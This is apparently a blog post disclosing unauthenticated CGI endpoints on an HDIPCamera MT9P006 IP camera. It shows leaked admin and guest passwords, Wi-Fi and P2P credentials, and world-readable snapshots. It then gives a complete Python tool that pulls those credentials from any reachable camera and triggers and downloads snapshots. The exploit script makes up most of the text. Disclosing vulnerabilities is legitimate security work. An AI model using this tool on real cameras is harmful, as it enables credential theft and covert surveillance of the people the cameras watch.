I pentested a camera, finding numerous vulnerabilities.
Product info:
HDIPCamera MT9P006
Version 1.0.1.2 (Dec 4 2015)
1/2.5-Inch 5 Mp CMOS Digital Image Sensor
Boardtype: 5300
sensortype: mt9p006
found in applications like:
• Digital still cameras
• Digital video cameras
• PC cameras
• Converged DSCs/camcorders
• Cellular phones
• PDAs
Let’s have a look. 😉
by just examining the source I found a few unprotected cgi requests.
A few importants cgi request can be used without any authorisation.
First getting some basic info
var serialNum="VVVIPCxxxxxxxxxxxx-xxxxxxxxxxxxx"; var model="RT_IPC"; var hardVersion="5300-mt9p006"; var softVersion="V2.3.5.2505-S50-SMA-B20151204B"; var ipcname="IPCAM"; var startdate="2016-8-30 21:56:44"; var runtimes="0 day, 1:58"; var sdstatus="out"; var sdfreespace="0 "; var sdtotalspace="0 "; var builddate="Dec 4 2015 "; var productmodel="null"; var vendor="RTJ"; var swver=""; var hwver=""; var mppver="mpp";
P2P info
var p2p_enable = "1"; var p2p_id = "PPIV-xxxxx-WZDZZ"; var p2p_pwd = "xxx";
Wifi info
var wifissid = "xxx"; var wifikeytype = "3"; var wifiwhichkey = "0"; var wifikey="xxxxxxxxxxxxxxxx"; var wifienable="0"; var wifimac="xx:xx:xx:xx:xx:xx"; var wifienable="0"; var linkstatus="0"; var linkssid=""; var wifimode="";
rtsp info
var rtsplisnport="554"; var onvif_http_port="1018"; var rtsp_user_verify="0";
User info (Including passwords)
var name0="admin"; var password0="admin"; var authLevel0="255"; var name1="guest"; var password1="guest"; var authLevel1="3"; var name2="xxx"; var password2="xxx"; var authLevel2="3"; var name3="xxx"; var password3="xxx"; var authLevel3="3"; var name4=""; var password4=""; var authLevel4="3"; var name5=""; var password5=""; var authLevel5="3"; var name6=""; var password6=""; var authLevel6="3"; var name7=""; var password7=""; var authLevel7="3"; var name8=""; var password8=""; var authLevel8="0"; var name9=""; var password9=""; var authLevel9="0";
It’s getting even better.
A world readable url with all the snapshots taken.
Ow wait.. let’s make some snapshots..
outputs:
var path=”/tmpfs/snap_tmpfs/20160831/IMG001/IMG_chn0_TIMER_MNG_20160831230808_001.jpg”
.. a freshly made snapshot.
I made a python script to make use of these cgi’s and outputs all the info.
And to make a snapshot and save it to local.
#!/bin/python
# Quick & Dirty tool
# Get all the info from the IPcam 5300 MT9P006
#
# Use commandline parameters to retrieve all kinds of info
#
# usage for all the info
# python IPcam_5300-mt9p006.py --ip <ip> --snapshot --getp2p --getwifi --getrtsp --getusers
import urllib
import urllib2
import re
import argparse
p2p="/cgi-bin/p2p.cgi?cmd=p2p.cgi&-action=get"
wifi="/cgi-bin/getwifiattr.cgi"
rtsp="/cgi-bin/hi3510/getrtsplisnport.cgi"
snap="/web/cgi-bin/hi3510/param.cgi?cmd=snap"
snap_dir="/tmpfs/snap_tmpfs/"
users="/web/cgi-bin/hi3510/param.cgi?cmd=getuser"
def get_param():
print "./IPcam_5300-mt9p600.py -h for cmd options"
try:
parser = argparse.ArgumentParser()
parser.add_argument("--ip", dest="ip", default="", help="ip adres", required=True)
parser.add_argument("--snapshot", dest="snapshot", action="store_true", help="make and download snapshot")
parser.add_argument("--getp2p", dest="getp2p", action="store_true", help="get p2p info (incl. password)")
parser.add_argument("--getwifi", dest="getwifi", action="store_true", help="get wifi info (incl. password)")
parser.add_argument("--getrtsp", dest="getrtsp", action="store_true", help="get rtsp info")
parser.add_argument("--getusers", dest="getusers", action="store_true", help="get user info (incl. passwords)")
args = parser.parse_args()
return args
except IOError, msg:
parser.error(str(msg))
def main():
params = get_param()
if params.snapshot:
# call cgi to make snapshot and save to local drive
print "make and download snapshot\n"
req = urllib2.Request("http://"+params.ip+snap)
url_data = urllib2.urlopen(req).read()
match = re.search(r"/(.*)", url_data)
snapfile_path = match.group(0)
# remove last 2 char " and \n
snapfile_path = snapfile_path[:-2]
match = re.search(r"IMG_(.*).jpg", snapfile_path)
snap_filename = match.group(0)
print "Snap file url: %s" % snapfile_path
print "Save output to: %s " % snap_filename
cmd="http://" + params.ip + snapfile_path
req1 = urllib2.Request(cmd)
f = open(snap_filename, "wb")
f.write(urllib2.urlopen(req1).read())
f.close()
if params.getp2p:
print "Get p2p info"
req = urllib2.Request("http://" + params.ip + p2p)
url_data = urllib2.urlopen(req).read()
print url_data
if params.getwifi:
print "Get wifi info"
req = urllib2.Request("http://" + params.ip + wifi)
url_data = urllib2.urlopen(req).read()
print url_data
if params.getrtsp:
print "Get rtsp info"
req = urllib2.Request("http://" + params.ip + rtsp)
url_data = urllib2.urlopen(req).read()
print url_data
if params.getusers:
print "Get users info"
req = urllib2.Request("http://" + params.ip + users)
url_data = urllib2.urlopen(req).read()
print url_data
if __name__ == "__main__":
main()